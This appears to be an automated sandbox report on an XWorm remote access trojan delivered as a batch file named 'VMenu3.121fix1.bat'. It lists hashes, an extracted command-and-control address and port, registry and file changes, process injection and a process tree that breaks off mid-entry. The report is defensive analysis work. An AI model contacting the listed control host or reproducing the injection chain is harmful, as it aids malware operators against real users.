xworm | fdb0641302824a729dcdbf6235a60a7661ee14951f82cc486cf0a874e8c38e1e

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 03:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VMenu3.121fix1.bat
Size

527KB
MD5

3d1653ee332959fc6ea17400cdb636bd
SHA1

3a75f6b73477b63300bc1065caaa7c9af066b6b4
SHA256

fdb0641302824a729dcdbf6235a60a7661ee14951f82cc486cf0a874e8c38e1e
SHA512

6eaaf2c0cd2322dcb9fcd71d030afaabaf13b0ed881fafe8db569da5cb2e196147045105067b3d5dc9aa80d2c61d44d6f063b82c74f6954b5bb956e4597e0b06
SSDEEP

6144:BLG0TmgMe4wGS6I4LjSAeEP3xI0r+/nBkJgrICpdZGz2LDpb5uZ8OaE2i88tmKb4:BCZgMe46AeSBHoBigr3ZnLjmsi4xq/G

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

operates-rna.with.playit.plus:4377

Attributes

Install_directory
%LocalAppData%
install_file
XClient2.0.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3088-48-0x000001645D380000-0x000001645D3D8000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1572 created 3684	1572	svchost.exe	122

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
28	3088	powershell.exe
35	3684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
540	powershell.exe
2836	powershell.exe
3088	powershell.exe
4900	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001800127D1A5595"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe

Modifies registry class 21 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133842816016637384"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133842816018668574"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133856208320959062"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133856207913615393"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133856207979552805"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133856208309552762"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133856207983303016"	svchost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
540	powershell.exe
540	powershell.exe
2836	powershell.exe
2836	powershell.exe
3088	powershell.exe
3088	powershell.exe
3088	powershell.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
4900	powershell.exe
4900	powershell.exe
4900	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
1572	svchost.exe
1572	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	2836	powershell.exe
Token: SeSecurityPrivilege	2836	powershell.exe
Token: SeTakeOwnershipPrivilege	2836	powershell.exe
Token: SeLoadDriverPrivilege	2836	powershell.exe
Token: SeSystemProfilePrivilege	2836	powershell.exe
Token: SeSystemtimePrivilege	2836	powershell.exe
Token: SeProfSingleProcessPrivilege	2836	powershell.exe
Token: SeIncBasePriorityPrivilege	2836	powershell.exe
Token: SeCreatePagefilePrivilege	2836	powershell.exe
Token: SeBackupPrivilege	2836	powershell.exe
Token: SeRestorePrivilege	2836	powershell.exe
Token: SeShutdownPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeSystemEnvironmentPrivilege	2836	powershell.exe
Token: SeRemoteShutdownPrivilege	2836	powershell.exe
Token: SeUndockPrivilege	2836	powershell.exe
Token: SeManageVolumePrivilege	2836	powershell.exe
Token: 33	2836	powershell.exe
Token: 34	2836	powershell.exe
Token: 35	2836	powershell.exe
Token: 36	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	2836	powershell.exe
Token: SeSecurityPrivilege	2836	powershell.exe
Token: SeTakeOwnershipPrivilege	2836	powershell.exe
Token: SeLoadDriverPrivilege	2836	powershell.exe
Token: SeSystemProfilePrivilege	2836	powershell.exe
Token: SeSystemtimePrivilege	2836	powershell.exe
Token: SeProfSingleProcessPrivilege	2836	powershell.exe
Token: SeIncBasePriorityPrivilege	2836	powershell.exe
Token: SeCreatePagefilePrivilege	2836	powershell.exe
Token: SeBackupPrivilege	2836	powershell.exe
Token: SeRestorePrivilege	2836	powershell.exe
Token: SeShutdownPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeSystemEnvironmentPrivilege	2836	powershell.exe
Token: SeRemoteShutdownPrivilege	2836	powershell.exe
Token: SeUndockPrivilege	2836	powershell.exe
Token: SeManageVolumePrivilege	2836	powershell.exe
Token: 33	2836	powershell.exe
Token: 34	2836	powershell.exe
Token: 35	2836	powershell.exe
Token: 36	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	2836	powershell.exe
Token: SeSecurityPrivilege	2836	powershell.exe
Token: SeTakeOwnershipPrivilege	2836	powershell.exe
Token: SeLoadDriverPrivilege	2836	powershell.exe
Token: SeSystemProfilePrivilege	2836	powershell.exe
Token: SeSystemtimePrivilege	2836	powershell.exe
Token: SeProfSingleProcessPrivilege	2836	powershell.exe
Token: SeIncBasePriorityPrivilege	2836	powershell.exe
Token: SeCreatePagefilePrivilege	2836	powershell.exe
Token: SeBackupPrivilege	2836	powershell.exe
Token: SeRestorePrivilege	2836	powershell.exe
Token: SeShutdownPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeSystemEnvironmentPrivilege	2836	powershell.exe
Token: SeRemoteShutdownPrivilege	2836	powershell.exe
Token: SeUndockPrivilege	2836	powershell.exe
Token: SeManageVolumePrivilege	2836	powershell.exe
Token: 33	2836	powershell.exe
Token: 34	2836	powershell.exe
Token: 35	2836	powershell.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3396	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4664 wrote to memory of 4984	4664	cmd.exe	85
PID 4664 wrote to memory of 4984	4664	cmd.exe	85
PID 4984 wrote to memory of 4724	4984	net.exe	86
PID 4984 wrote to memory of 4724	4984	net.exe	86
PID 4664 wrote to memory of 3660	4664	cmd.exe	91
PID 4664 wrote to memory of 3660	4664	cmd.exe	91
PID 4664 wrote to memory of 540	4664	cmd.exe	92
PID 4664 wrote to memory of 540	4664	cmd.exe	92
PID 540 wrote to memory of 2836	540	powershell.exe	96
PID 540 wrote to memory of 2836	540	powershell.exe	96
PID 540 wrote to memory of 1492	540	powershell.exe	99
PID 540 wrote to memory of 1492	540	powershell.exe	99
PID 1492 wrote to memory of 3988	1492	WScript.exe	101
PID 1492 wrote to memory of 3988	1492	WScript.exe	101
PID 3988 wrote to memory of 2080	3988	cmd.exe	103
PID 3988 wrote to memory of 2080	3988	cmd.exe	103
PID 2080 wrote to memory of 3452	2080	net.exe	104
PID 2080 wrote to memory of 3452	2080	net.exe	104
PID 3988 wrote to memory of 2300	3988	cmd.exe	106
PID 3988 wrote to memory of 2300	3988	cmd.exe	106
PID 3988 wrote to memory of 3088	3988	cmd.exe	107
PID 3988 wrote to memory of 3088	3988	cmd.exe	107
PID 3088 wrote to memory of 4328	3088	powershell.exe	108
PID 3088 wrote to memory of 4328	3088	powershell.exe	108
PID 4328 wrote to memory of 3492	4328	cmd.exe	110
PID 4328 wrote to memory of 3492	4328	cmd.exe	110
PID 4328 wrote to memory of 636	4328	cmd.exe	111
PID 4328 wrote to memory of 636	4328	cmd.exe	111
PID 636 wrote to memory of 4900	636	powershell.exe	113
PID 636 wrote to memory of 4900	636	powershell.exe	113
PID 636 wrote to memory of 4076	636	powershell.exe	115
PID 636 wrote to memory of 4076	636	powershell.exe	115
PID 4076 wrote to memory of 1700	4076	WScript.exe	119
PID 4076 wrote to memory of 1700	4076	WScript.exe	119
PID 1700 wrote to memory of 3188	1700	cmd.exe	121
PID 1700 wrote to memory of 3188	1700	cmd.exe	121
PID 1700 wrote to memory of 3684	1700	cmd.exe	122
PID 1700 wrote to memory of 3684	1700	cmd.exe	122
PID 3684 wrote to memory of 3396	3684	powershell.exe	55
PID 3684 wrote to memory of 2560	3684	powershell.exe	44
PID 3684 wrote to memory of 1572	3684	powershell.exe	116
PID 3684 wrote to memory of 1172	3684	powershell.exe	19
PID 3684 wrote to memory of 1760	3684	powershell.exe	31
PID 3684 wrote to memory of 5108	3684	powershell.exe	72
PID 3684 wrote to memory of 1952	3684	powershell.exe	33
PID 3684 wrote to memory of 1752	3684	powershell.exe	30
PID 3684 wrote to memory of 2144	3684	powershell.exe	52
PID 3684 wrote to memory of 960	3684	powershell.exe	12
PID 3684 wrote to memory of 2732	3684	powershell.exe	48
PID 3684 wrote to memory of 2728	3684	powershell.exe	47
PID 3684 wrote to memory of 756	3684	powershell.exe	14
PID 3684 wrote to memory of 1344	3684	powershell.exe	23
PID 3684 wrote to memory of 2524	3684	powershell.exe	43
PID 3684 wrote to memory of 2324	3684	powershell.exe	41
PID 3684 wrote to memory of 1336	3684	powershell.exe	22
PID 3684 wrote to memory of 1136	3684	powershell.exe	18
PID 3684 wrote to memory of 1720	3684	powershell.exe	29
PID 3684 wrote to memory of 924	3684	powershell.exe	16
PID 3684 wrote to memory of 1116	3684	powershell.exe	17
PID 3684 wrote to memory of 2464	3684	powershell.exe	100
PID 3684 wrote to memory of 2096	3684	powershell.exe	38
PID 3684 wrote to memory of 5048	3684	powershell.exe	71
PID 3684 wrote to memory of 908	3684	powershell.exe	11
PID 3684 wrote to memory of 5004	3684	powershell.exe	123

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:804
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:4228
- C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  2⤵
  PID:1224
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:4328
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:3680
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:3816
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:772
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:3520
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:4960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2332

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3232

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VMenu3.121fix1.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4664
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\system32\net1.exe
